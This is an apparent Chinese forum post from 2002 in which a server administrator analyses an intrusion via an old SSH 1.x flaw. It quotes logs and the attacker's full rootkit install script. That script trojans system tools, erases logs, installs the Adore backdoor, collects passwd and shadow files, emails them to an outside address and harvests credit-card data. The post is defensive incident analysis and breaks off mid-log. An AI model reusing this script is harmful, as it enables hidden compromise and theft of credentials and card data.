| 关键词: dnscache ATTACK sshd root Jan Network compensation Connection echo detected |
本来也不知道自己的机器有人进来了,因为放在内部,能经过NAT进来的几乎是不可能的,但无意登陆机器随便看看,发现有个glibc的动态库不见了,立刻到message那看看,什么都没有。FT,立刻启动备份机器,把硬盘拔出来,插到我的其他服务器上检查。唉,果然。。。 [root@mail a]# la- la bash: la-: command not found [root@mail a]# ls -la total 704 drwxr-xr-x 23 root root 4096 Feb 2 08:08 . drwxr-xr-x 7 root root 4096 Feb 5 18:15 .. drwxr-xr-x 2 root root 4096 Oct 27 1999 .automount drwxr-xr-x 2 root root 4096 Nov 23 20:26 CVS drwxr-xr-x 2 root root 4096 Feb 2 08:08 bin drwxr-xr-x 2 root root 4096 Feb 3 17:55 boot drwxr-xr-x 2 root root 4096 Nov 23 22:04 command -rw------- 1 root root 241664 Jan 28 23:01 core 就是这里溢出啦,看来是FTP或者SSH的问题,内部实验机器,内部IP 就懒得升级,结果。。。等下再gdm你好了。 drwxr-xr-x 7 root root 36864 Feb 2 08:08 dev -rw-r--r-- 1 root root 330646 Feb 2 08:08 eddyrk.tar.gz 真要命,直接放,搞不懂是高手失误还是只会用别人的程序。 drwxr-xr-x 38 root root 4096 Feb 4 23:23 etc drwxr-xr-x 2 root root 4096 Nov 23 20:20 home drwxr-xr-x 4 root root 4096 Nov 23 20:30 lib drwxr-xr-x 2 root root 16384 Nov 23 20:20 lost+found drwxr-xr-x 2 root root 4096 Oct 31 1999 misc drwxr-xr-x 4 root root 4096 Nov 23 20:26 mnt drwxr-xr-t 3 root root 4096 Nov 23 22:03 package dr-xr-xr-x 2 root root 4096 Feb 7 1996 proc drwxr-xr-x 2 qmails 507 4096 Dec 14 21:40 rk 就是这个rootkit!看来很多人用这个呢 drwxr-xr-x 6 root root 4096 Feb 2 23:46 root drwxr-xr-x 3 root root 4096 Feb 2 08:08 sbin 看到这2个目录没有,已经给改动过了,不可信任。 drwxr-xr-x 2 root root 4096 Nov 23 21:40 service drwxrwxrwt 3 root root 4096 Feb 4 23:01 tmp drwxr-xr-x 16 root root 4096 Nov 23 20:29 usr drwxr-xr-x 2 root root 4096 Nov 23 20:20 var [root@mail a]# date 星期二 02 5 18:28:17 CST 2002 [root@mail rk]# cat install #!/bin/sh unset HISTFILE STARTDIR=`pwd` CARDLOG="/usr/lib/locale/ro_RO/uboot/card.log" 这个程序的作者真不是人,连别人的信用卡都偷! SMP=`uname -a | grep smp | wc -l` 还真的没考虑过入侵需要考虑是否SMP呢 clear echo "***** \dev\hda1`s aka Mithra`s rootkit *****" echo "* greetz 2 bogonel and Amorph|s *" echo "* This is the RedHat 7.0 build *" echo "********************************************" sleep 2 clear echo "Please wait while Setup is preparing your directory ... " sleep 5 clear echo "Heh, sounds like f***in' Windoze, doesn't it ? :) " sleep 2 clear DIR="/usr/lib/locale/ro_RO/uboot" mkdir -p $DIR mkdir -p $DIR/etc cp -f * $DIR/ >>/dev/null 少有的清空方式,这样就没办法追查INODE了。 cd $DIR echo "Installing trojaned system files ..." echo "[*] Process tools ..." 替换查看进程命令,FT echo " |---ps" chattr -aiu /bin/ps ./sz /bin/ps ps mv -f ps /bin/ps chattr +aiu /bin/ps echo " | \\" echo " | |-- done replacing ps " sleep 1 echo " |---pstree" chattr -aiu /usr/bin/pstree ./sz /usr/bin/pstree pstree mv -f pstree /usr/bin/pstree chattr +aiu /usr/bin/pstree echo " | \\" echo " | |-- done replacing pstree " sleep 1 echo " |---top" chattr -aiu /usr/bin/top ./sz /usr/bin/top top mv -f top /usr/bin/top chattr +aiu /usr/bin/top echo " | \\" echo " | |-- done replacing top " echo " |----|" sleep 5 echo "[*] Network tools ..." 替换网络命令,FT,毒 echo " |---netstat" chattr -aiu /bin/netstat ./sz /bin/netstat netstat mv -f netstat /bin/netstat chattr +aiu /bin/netstat echo " | \\" echo " | |-- done replacing netstat " sleep 1 echo " |---ifconfig" chattr -aiu /sbin/ifconfig ./sz /sbin/ifconfig ifconfig mv -f ifconfig /sbin/ifconfig chattr +aiu /sbin/ifconfig echo " | \\" echo " | |-- done replacing ifconfig " #echo " |---inetd" 贱啊,什么都换了 #chattr -aiu /usr/sbin/inetd #./sz /usr/sbin/inetd inetd #mv -f inetd /usr/sbin/inetd #chattr +aiu /usr/sbin/inetd #echo " | \\" #echo " | |-- done replacing inetd " sleep 1 echo " |---tcpd" chattr -aiu /usr/sbin/tcpd ./sz /usr/sbin/tcpd tcpd mv -f tcpd /usr/sbin/tcpd chattr +aiu /usr/sbin/tcpd echo " | \\" echo " | |-- done replacing tcpd " echo " |----|" sleep 1 echo "[*] Filesystem tools ..." 换了查找命令 echo " |---find" chattr -aiu /usr/bin/find ./sz /usr/bin/find find mv -f find /usr/bin/find chattr +aiu /usr/bin/find echo " | \\" echo " | |-- done replacing find " sleep 1 echo " |---ls" chattr -aiu /bin/ls ./sz /bin/ls ls mv -f ls /bin/ls chattr +aiu /bin/ls echo " | \\" echo " | |-- done replacing ls " echo " |----|" echo " |---dir" chattr -aiu /usr/bin/dir ./sz /usr/bin/dir dir mv -f dir /usr/bin/dir chattr +aiu /usr/bin/dir echo " | \\" echo " | |-- done replacing dir " echo " |----|" sleep 1 echo "[*] System tools ..." echo " |---syslogd" chattr -aiu /sbin/syslogd ./sz /sbin/syslogd syslogd mv -f syslogd /sbin/syslogd chattr +aiu /sbin/syslogd echo " | \\" echo " | |-- done replacing syslog " echo " |----|" 删除所有log文件,不过这里写得不好。 用不删除,清内容更好。 rm -f /var/log/messages touch /var/log/messages /etc/rc.d/init.d/syslog restart sleep 1 echo "[*] Placing configuration files in $DIR/etc/ ..." mv -f netstatrc $DIR/etc/netstatrc mv -f procrc $DIR/etc/procrc mv -f filerc $DIR/etc/filerc mv -f logrc $DIR/etc/logrc sleep 1 开始编译外挂进程了,还好,不是LKM echo "[*] Trying to install ADORE ..." if [ -x /usr/bin/gcc ]; then echo "GCC is present" if [ -d /usr/src/linux ]; then if [ $SMP -eq 0 ]; then echo "We have a machine without SMP support" cp -f Makefile.non-smp Makefile else echo "This machine supports SMP" cp -f Makefile.smp Makefile fi make mv -f ava /usr/bin/weather 还改头换面呢,呵呵~~ rm -f *.c *.h Makefile* echo "ADORE is now installed ..." else echo "Kernel sources are not installed. Cannot install ADORE !" fi else echo "GCC is not installed. Cannot install ADORE !" fi echo "[*] Replacing /etc/rc.d/init.d/network with ours ..." mv -f network /etc/rc.d/init.d/network sleep 5 mv -f twist2open /usr/bin/ echo "[*] Starting services ..." #echo " |---backdoor ..." #echo " |---sniffer ..." 加了后门还开SNIFFER,哼哼 #echo " |---bnc ..." /usr/bin/twist2open & echo " | \\" echo " | |-- done" echo " |----|" rm -f ./*pid* /*pid* /*log* sleep 5 echo "[*] Gathering system info ..." echo " |---uname -a" uname -a >>file echo " |---ifconfig" /sbin/ifconfig >>file echo "|------" >>file echo " |---passwd file" cat /etc/passwd >>file echo " |---shadow file" echo "|------" >>file cat /etc/shadow >>file 哇!!!!我的密码啊!!!!!!! echo " |---ping statistics" ping -c 5 216.115.108.245 >>file echo " | \\" echo " | |-- done" echo "[*] Fixing vulns ..." echo " |---.bash_history" chattr +ia /root/.bash_history 聪明!的确要佩服这个作者了 echo " |---ftpd" chmod -s /var/ftp/* echo " |---rpc" chmod -s /usr/bin/rpc* chmod -s /usr/sbin/rpc* chmod -s /sbin/rpc* echo " |---named" chmod -s /var/named 所有应用程序都加上了SUID,幸亏我从来不用默认的服务的 sleep 5 echo " | \\" echo " | |-- done" echo " |----|" echo "[*] Cleaning logs. This will take a while ..." 开始清除LOG,进行收尾工作。 ./logcleaner ftp >>/dev/null ./logcleaner rpc >>/dev/null ./logcleaner named >>/dev/null ./logcleaner yahoo >>/dev/null ./logcleaner bind >>/dev/null ./logcleaner geocities >>/dev/null ./logcleaner hypermart >>/dev/null ./logcleaner syslogd >>/dev/null sleep 1 echo " | \\" echo " | |-- done" echo " |----|" echo "[*] Mailing system information ..." mail -s "`uname -a`" [email protected] 把所有资料都MAIL出去,毒 rm -f file cd $STARTDIR rm -rf ../*rh* echo "[*] Looking for cards ..." touch $CARDLOG egrep -ir 'mastercard|visa' /home|egrep -v cache >>$CARDLOG egrep -ir 'mastercard|visa' /var|egrep -v cache >>$CARDLOG egrep -ir 'mastercard|visa' /root|egrep -v cache >>$CARDLOG if [ -d /www ]; then egrep -ir 'mastercard|visa' /www|egrep -v cache >>$CARDLOG fi 这些代码就很有问题了,我在怀疑作者的人格了。 echo "Rootkit successfully installed. Enjoy !" 继续分析 [root@mail log]# cat secure Jan 28 23:28:17 dnscache in.ftpd[2767]: connect from 192.168.100.26 Jan 28 23:28:17 dnscache in.ftpd[2767]: error: cannot execute /usr/sbin/in.ftpd: No such file or directory Jan 30 04:44:05 dnscache in.telnetd[3891]: connect from 192.168.100. 141 Jan 30 17:41:17 dnscache in.telnetd[4199]: connect from 211.155.24.246 Jan 31 00:52:23 dnscache login: FAILED LOGIN 1 FROM (null) FOR , User not known to the underlying authentication module Jan 31 19:13:57 dnscache in.telnetd[872]: connect from 192.168.100.141 Feb 1 04:03:46 dnscache in.telnetd[1143]: connect from 192.168.100.25 Feb 1 04:12:23 dnscache in.telnetd[1166]: connect from 192.168.100.25 Feb 1 07:34:10 dnscache in.telnetd[1282]: connect from 211.155.24.246 Feb 2 07:05:13 dnscache in.telnetd[1927]: connect from 218.17.238.238 Feb 2 07:16:47 dnscache in.telnetd[1928]: connect from 218.17.238.238 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~问题来了,那是ADSL用户,而我是在内网 ,怎么可能进来的?FT,要检讨内部安全问题了。 看一下wtmp先:恩。。。正常 pts/0 chair 192.168.100.25 pts/0 pts/0 chair 192.168.100.25 pts/0 pts/0 chair 211.155.24.246 pts/0 runlevel tty1 \tty2 tty3 \tty4 tty5 \tty6 tty1 X.\tty1 chair f.\reboot runlevel tty1 LOGIN 看看FTP的记录先,最讨厌FTP进来的人,只有自己。。。删了记录? root@mail log]# cat xferlog Fri Nov 23 21:17:31 2001 0 192.168.100.80 36975 /home/chair/daemontools-0.76.tar.gz b _ i r chair ftp 0 * Fri Nov 23 21:17:32 2001 0 192.168.100.80 53019 /home/chair/ucspi-tcp-0.88.tar.gz b _ i r chair ftp 0 * Fri Nov 23 21:17:34 2001 0 192.168.100.80 85648 /home/chair/djbdns-1. 05.tar.gz b _ i r chair ftp 0 * Fri Nov 23 21:17:35 2001 0 192.168.100.80 28416 /home/chair/qmailanalog-0.70.tar.gz b _ i r chair ftp 0 * [root@mail ssh-scan]#pwd /mnt/c/var/tmp/ssh-scan [root@mail ssh-scan]# ls -la total 32 drwxr-xr-x 8 operator root 4096 Dec 2 08:22 . drwxrwxrwt 3 root root 4096 Feb 2 08:23 .. drwxr-xr-x 2 operator root 4096 Dec 2 08:07 bind drwxr-xr-x 2 operator root 4096 Dec 2 08:07 ftpd drwxr-xr-x 2 operator root 4096 Dec 2 08:07 lpd drwxr-xr-x 2 operator root 4096 Jun 16 2001 rpc drwxr-xr-x 2 operator root 4096 Jun 14 2001 src drwxr-xr-x 4 operator root 4096 Jan 21 19:57 ssh 奇怪,应该是SCAN这些东西时候留下的文件锁,看来线索 还是不少,或者这个进来的家伙太粗心了。 [root@mail mail]# pwd /mnt/c/spool/mail [root@mail mail]#cat root |more 太多了,垃圾日志省去大部分 From root Sun Dec 2 05:01:00 2001 Return-Path: Received: (from root@localhost) by dnscache.i-168.com (8.9.3/8.9.3) id FAA23746 for root; Sun, 2 Dec 2001 05:01:00 +0800 Date: Sun, 2 Dec 2001 05:01:00 +0800 From: root Message-Id: To: [email protected] Subject: dnscache.i-168.com 12/02/01:05.01 system check Unusual System Events =-=-=-=-=-=-=-=-=-=-= *************** 问题大大的明显!!FT,我的错。 *** WARNING ***: Log file /var/log/messages is smaller than last time checked! *************** This could indicate tampering. Dec 2 04:02:00 dnscache syslogd 1.3-3: restart. Dec 2 04:02:01 dnscache syslogd 1.3-3: restart. Dec 2 04:02:01 dnscache syslogd 1.3-3: restart. *************** *** WARNING ***: Log file /var/log/secure is smaller than last time checked! *************** This could indicate tampering. *************** *** WARNING ***: Log file /var/log/maillog is smaller than last time checked! *************** This could indicate tampering. From root Sun Dec 9 04:02:01 2001 Return-Path: Received: (from root@localhost) by dnscache.i-168.com (8.9.3/8.9.3) id EAA11188 for root; Sun, 9 Dec 2001 04:02:01 +0800 Date: Sun, 9 Dec 2001 04:02:01 +0800 From: root Message-Id: To: [email protected] Subject: errors rotating logs errors occured while rotating /var/log/httpd/access_log httpd: no process killed error running postrotate script Unusual System Events =-=-=-=-=-=-=-=-=-=-= *************** *** WARNING ***: Log file /var/log/messages is smaller than last time checked! *************** This could indicate tampering. Dec 9 04:02:01 dnscache syslogd 1.3-3: restart. Dec 9 04:02:01 dnscache syslogd 1.3-3: restart. Dec 9 04:02:01 dnscache syslogd 1.3-3: restart. *************** *** WARNING ***: Log file /var/log/secure is smaller than last time checked! From root Wed Jan 16 04:01:01 2002 Return-Path: Received: (from root@localhost) by dnscache.i-168.com (8.9.3/8.9.3) id EAA16976 for root; Wed, 16 Jan 2002 04:01:01 +0800 Date: Wed, 16 Jan 2002 04:01:01 +0800 From: root Message-Id: To: [email protected] Subject: dnscache.i-168.com 01/16/02:04.01 system check Unusual System Events =-=-=-=-=-=-=-=-=-=-= Jan 16 03:41:35 dnscache sshd[16485]: log: Connection from 200.184.184. 51 port 3997 Jan 16 03:41:36 dnscache sshd[16485]: fatal: Did not receive ident string. 扫描吧,哈哈~~ From root Mon Jan 21 18:01:01 2002 Return-Path: Received: (from root@localhost) by dnscache.i-168.com (8.9.3/8.9.3) id SAA19794 for root; Mon, 21 Jan 2002 18:01:01 +0800 Date: Mon, 21 Jan 2002 18:01:01 +0800 From: root Message-Id: To: [email protected] Subject: dnscache.i-168.com 01/21/02:18.01 ACTIVE SYSTEM ATTACK! HOHO~~~~原来是SSH的问题,我的SSH是那个什么破STARLINUX自带的, 1.X吧,因为是实验机器,懒得升级,FT。问题来了 Active System Attack Alerts =-=-=-=-=-=-=-=-=-=-=-=-=-= Jan 21 17:39:18 dnscache sshd[18176]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:04 dnscache sshd[18224]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation attack: network attack detected Security Violations =-=-=-=-=-=-=-=-=-= Jan 21 17:39:18 dnscache sshd[18176]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:04 dnscache sshd[18224]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:50 dnscache sshd[18290]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:53 dnscache sshd[18293]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:57 dnscache sshd[18294]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:43:00 dnscache sshd[18297]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:43:03 dnscache sshd[18300]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:43:07 dnscache sshd[18303]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:43:10 dnscache sshd[18304]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:43:18 dnscache sshd[18310]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:35:47 dnscache sshd[18052]: log: Connection from 141.108.9. 13 port 4639 Jan 21 17:35:47 dnscache sshd[18053]: log: Connection from 141.108.9. 13 port 4648 Jan 21 17:35:49 dnscache sshd[18053]: fatal: Local: Your ssh version is too old and is no longer supported. Pl ease install a newer version. 原来是这个家伙!但IP很古怪,是不是肉鸡?? Jan 21 17:35:49 dnscache sshd[18056]: log: Connection from 141.108.9. 13 port 4651 Jan 21 17:36:36 dnscache sshd[18075]: log: Connection from 141.108.9. 13 port 4674 Jan 21 17:36:39 dnscache sshd[18078]: log: Connection from 141.108.9. 13 port 4676 Jan 21 17:36:42 dnscache sshd[18078]: fatal: Local: Corrupted check bytes on input. Jan 21 17:36:43 dnscache sshd[18079]: log: Connection from 141.108.9. 13 port 4679 Jan 21 17:36:46 dnscache sshd[18082]: log: Connection from 141.108.9. 13 port 4682 Jan 21 17:36:49 dnscache sshd[18082]: fatal: Local: Corrupted check bytes on input. Jan 21 17:36:50 dnscache sshd[18085]: log: Connection from 141.108.9. 13 port 4685 Jan 21 17:36:53 dnscache sshd[18085]: fatal: Local: Corrupted check bytes on input. Jan 21 17:36:53 dnscache sshd[18088]: log: Connection from 141.108.9. 13 port 4687 Jan 21 17:36:57 dnscache sshd[18089]: log: Connection from 141.108.9. 13 port 4690 Jan 21 17:37:00 dnscache sshd[18089]: fatal: Local: Corrupted check bytes on input. Jan 21 17:37:00 dnscache sshd[18092]: log: Connection from 141.108.9. 13 port 4692 Jan 21 17:37:04 dnscache sshd[18095]: log: Connection from 141.108.9. 13 port 4694 Jan 21 17:37:07 dnscache sshd[18095]: fatal: Local: Corrupted check bytes on input. Jan 21 17:37:08 dnscache sshd[18096]: log: Connection from 141.108.9. 13 port 4697 Jan 21 17:37:12 dnscache sshd[18099]: log: Connection from 141.108.9. 13 port 4699 Jan 21 17:37:24 dnscache sshd[18099]: fatal: Local: Corrupted check bytes on input. Jan 21 17:37:25 dnscache sshd[18106]: log: Connection from 141.108.9. 13 port 4705 Jan 21 17:37:28 dnscache sshd[18106]: fatal: Local: Corrupted check bytes on input. Jan 21 17:37:28 dnscache sshd[18109]: log: Connection from 141.108.9. 13 port 4708 Jan 21 17:37:28 dnscache sshd[18106]: fatal: Local: Corrupted check bytes on input. Jan 21 17:37:28 dnscache sshd[18109]: log: Connection from 141.108.9. 13 port 4708 Jan 21 17:37:31 dnscache sshd[18109]: fatal: Local: Corrupted check bytes on input. Jan 21 17:37:32 dnscache sshd[18110]: log: Connection from 141.108.9. 13 port 4712 Jan 21 17:37:36 dnscache sshd[18113]: log: Connection from 141.108.9. 13 port 4713 Jan 21 17:37:40 dnscache sshd[18116]: log: Connection from 141.108.9. 13 port 4715 Jan 21 17:37:43 dnscache sshd[18116]: fatal: Local: Corrupted check bytes on input. Jan 21 17:37:43 dnscache sshd[18119]: log: Connection from 141.108.9. 13 port 4719 Jan 21 17:37:47 dnscache sshd[18120]: log: Connection from 141.108.9. 13 port 4720 Jan 21 17:37:51 dnscache sshd[18123]: log: Connection from 141.108.9. 13 port 1265Jan 21 17:41:12 dnscache sshd[18236]: log: Connection from 141.108.9.13 port 2326 Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:19 dnscache sshd[18241]: log: Connection from 141.108.9. 13 port 2762 Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:26 dnscache sshd[18244]: log: Connection from 141.108.9. 13 port 4015 Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:33 dnscache sshd[18247]: log: Connection from 141.108.9. 13 port 4017 Jan 21 17:41:40 dnscache sshd[18252]: log: Connection from 141.108.9. 13 port 4019 Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:41:52 dnscache sshd[18257]: log: Connection from 141.108.9. 13 port 1049 Jan 21 17:41:59 dnscache sshd[18262]: log: Connection from 141.108.9. 13 port 1051 Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:07 dnscache sshd[18265]: log: Connection from 141.108.9. 13 port 1945 Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:14 dnscache sshd[18270]: log: Connection from 141.108.9. 13 port 3191 Jan 21 17:42:23 dnscache sshd[18273]: log: Connection from 141.108.9. 13 port 4027 Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:26 dnscache sshd[18276]: log: Connection from 141.108.9. 13 port 1110 Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:30 dnscache sshd[18279]: log: Connection from 141.108.9. 13 port 1557 Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:33 dnscache sshd[18280]: log: Connection from 141.108.9. 13 port 2124 Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:36 dnscache sshd[18283]: log: Connection from 141.108.9. 13 port 2630 Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:40 dnscache sshd[18286]: log: Connection from 141.108.9. 13 port 3184 Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:43 dnscache sshd[18287]: log: Connection from 141.108.9. 13 port 3915 Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:42:47 dnscache sshd[18290]: log: Connection from 141.108.9. 13 port 3918 an 21 17:43:01 dnscache sshd[18300]: log: Connection from 141.108.9.13 port 1033 Jan 21 17:43:03 dnscache sshd[18300]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:43:04 dnscache sshd[18303]: log: Connection from 141.108.9. 13 port 1034 Jan 21 17:43:07 dnscache sshd[18303]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:43:08 dnscache sshd[18304]: log: Connection from 141.108.9. 13 port 1036 Jan 21 17:43:10 dnscache sshd[18304]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:43:11 dnscache sshd[18307]: log: Connection from 141.108.9. 13 port 1586 Jan 21 17:43:14 dnscache sshd[18307]: fatal: Local: Corrupted check bytes on input. Jan 21 17:43:15 dnscache sshd[18310]: log: Connection from 141.108.9. 13 port 2150 Jan 21 17:43:18 dnscache sshd[18310]: fatal: Local: crc32 compensation attack: network attack detected Jan 21 17:43:18 dnscache sshd[18311]: log: Connection from 141.108.9. 13 port 2665 Jan 21 17:43:22 dnscache sshd[18314]: log: Connection from 141.108.9. 13 port 3162 Jan 21 17:43:30 dnscache sshd[18319]: log: Connection from 141.108.9. 13 port 4975 Jan 21 17:43:34 dnscache sshd[18320]: log: Connection from 141.108.9. 13 port 1512 从开始连接到溢出只是用了10来分钟,看来SSH1.X不能用了。 Jan 21 17:45:48 dnscache sshd[18052]: fatal: Timeout before authentication. Jan 21 17:47:37 dnscache adduser[18423]: new user: name=cgi, uid=0, gid=0, home=/home/cgi, shell=/bin/bash 加帐号了,5~~~~~ Jan 21 17:47:52 dnscache PAM_pwdb[18426]: password for (cgi/0) changed by ((null)/0) Jan 21 17:48:00 dnscache PAM_pwdb[18433]: password for (operator/11) changed by ((null)/0) 干吗改自己的密码呢?有问题。 Jan 21 17:48:18 dnscache sshd[18442]: log: Connection from 80.96.178.195 port 1465 Jan 21 17:48:20 dnscache sshd[18442]: log: Could not reverse map address 80.96.178.195. Jan 21 17:48:28 dnscache sshd[18442]: log: Password authentication for operator accepted. Jan 21 17:49:12 dnscache sshd[18484]: log: Connection from 80.96.178.194 port 2274 Jan 21 17:49:12 dnscache sshd[18484]: log: Could not reverse map address 80.96.178.194. Jan 21 17:49:20 dnscache sshd[18484]: log: Password authentication for operator accepted. 情况很明显了,用了多个IP干活,能确定是肉鸡了,FT。 Jan 21 17:50:30 dnscache sshd[18484]: fatal: Read error from remote host: Connection reset by peer Jan 21 17:51:08 dnscache sshd[18555]: log: Connection from 80.96.178.194 port 2281 Jan 21 17:51:08 dnscache sshd[18555]: log: Could not reverse map address 80.96.178.194. Jan 21 17:51:19 dnscache sshd[18555]: log: Password authentication for operator accepted. Jan 21 17:58:11 dnscache sshd[18442]: fatal: Read error from remote host: Connection reset by peer by dnscache.i-168.com (8.9.3/8.9.3) id TAA23666 for root; Mon, 21 Jan 2002 19:01:01 +0800 Date: Mon, 21 Jan 2002 19:01:01 +0800 From: root Message-Id: To: [email protected] Subject: dnscache.i-168.com 01/21/02:19.01 system check Unusual System Events =-=-=-=-=-=-=-=-=-=-= Jan 21 18:17:41 dnscache sshd[270]: log: Generating new 768 bit RSA key. Jan 21 18:17:41 dnscache sshd[270]: log: RSA key generation complete. Jan 21 19:00:16 dnscache sshd[23334]: log: Connection from 80.96.178.195 port 1519 Jan 21 19:00:16 dnscache sshd[23334]: log: Could not reverse map address 80.96.178.195. Jan 21 19:00:25 dnscache sshd[23334]: log: Password authentication for operator accepted. From root Mon Jan 21 20:01:02 2002 Return-Path: Received: (from root@localhost) by dnscache.i-168.com (8.9.3/8.9.3) id UAA29460 for root; Mon, 21 Jan 2002 20:01:01 +0800 Date: Mon, 21 Jan 2002 20:01:01 +0800 From: root Message-Id: To: [email protected] Subject: dnscache.i-168.com 01/21/02:20.01 system check Unusual System Events =-=-=-=-=-=-=-=-=-=-= Jan 21 19:01:54 dnscache sshd[23334]: fatal: Read error from remote host: Connection reset by peer Jan 21 19:13:33 dnscache sshd[23975]: log: Connection from 80.96.178.194 port 2406 Jan 21 19:13:33 dnscache sshd[23975]: log: Could not reverse map address 80.96.178.194. Jan 21 19:13:44 dnscache sshd[23975]: log: Password authentication for operator accepted. Jan 21 19:17:41 dnscache sshd[270]: log: Generating new 768 bit RSA key. 有新机器进来呢,FT,不是好兆头 重启 From root Mon Jan 21 23:01:00 2002 Return-Path: Received: (from root@localhost) by dnscache.i-168.com (8.9.3/8.9.3) id XAA00309 for root; Mon, 21 Jan 2002 23:01:00 +0800 Date: Mon, 21 Jan 2002 23:01:00 +0800 From: root Message-Id: To: [email protected] Subject: dnscache.i-168.com 01/21/02:23.01 system check Feb 2 07:28:18 dnscache sshd[1991]: log: Connection from 24.112.92. 135 port 3854 Feb 2 07:28:21 dnscache sshd[1992]: log: Connection from 24.112.92. 135 port 3855 Feb 2 07:28:30 dnscache sshd[1992]: fatal: Local: crc32 compensation attack: network attack detected Feb 2 07:28:31 dnscache sshd[1993]: log: Connection from 24.112.92. 135 port 3856 Feb 2 07:28:34 dnscache sshd[1993]: fatal: Local: crc32 compensation attack: network attack detected Feb 2 07:28:34 dnscache sshd[1994]: log: Connection from 24.112.92. 135 port 3857 Feb 2 07:28:39 dnscache sshd[1994]: fatal: Local: crc32 compensation attack: network attack detected Feb 2 07:28:40 dnscache sshd[1995]: log: Connection from 24.112.92. 135 port 3858 Feb 2 07:28:44 dnscache sshd[1995]: fatal: Local: crc32 compensation attack: network attack detected Feb 2 07:28:46 dnscache sshd[1996]: log: Connection from 24.112.92. 135 port 3859 Feb 2 07:28:49 dnscache sshd[1996]: fatal: Local: crc32 compensation attack: network attack detected Feb 2 07:28:49 dnscache sshd[1997]: log: Connection from 24.112.92. 135 port 3860 Feb 2 07:28:54 dnscache sshd[1997]: fatal: Local: crc32 compensation attack: network attack detected Feb 2 07:28:55 dnscache sshd[1998]: log: Connection from 24.112.92. 135 port 3861 Feb 2 07:28:59 dnscache sshd[1998]: fatal: Local: crc32 compensation attack: network attack detected Feb 2 07:28:59 dnscache sshd[1999]: log: Connection from 24.112.92. 135 port 3862 Feb 2 07:29:05 dnscache sshd[1999]: fatal: Local: crc32 compensation attack: network attack detected Feb 2 07:29:06 dnscache sshd[2000]: log: Connection from 24.112.92. 135 port 3863 Feb 2 07:29:09 dnscache sshd[2000]: fatal: Local: crc32 compensation attack: network attack detected Feb 2 07:29:10 dnscache 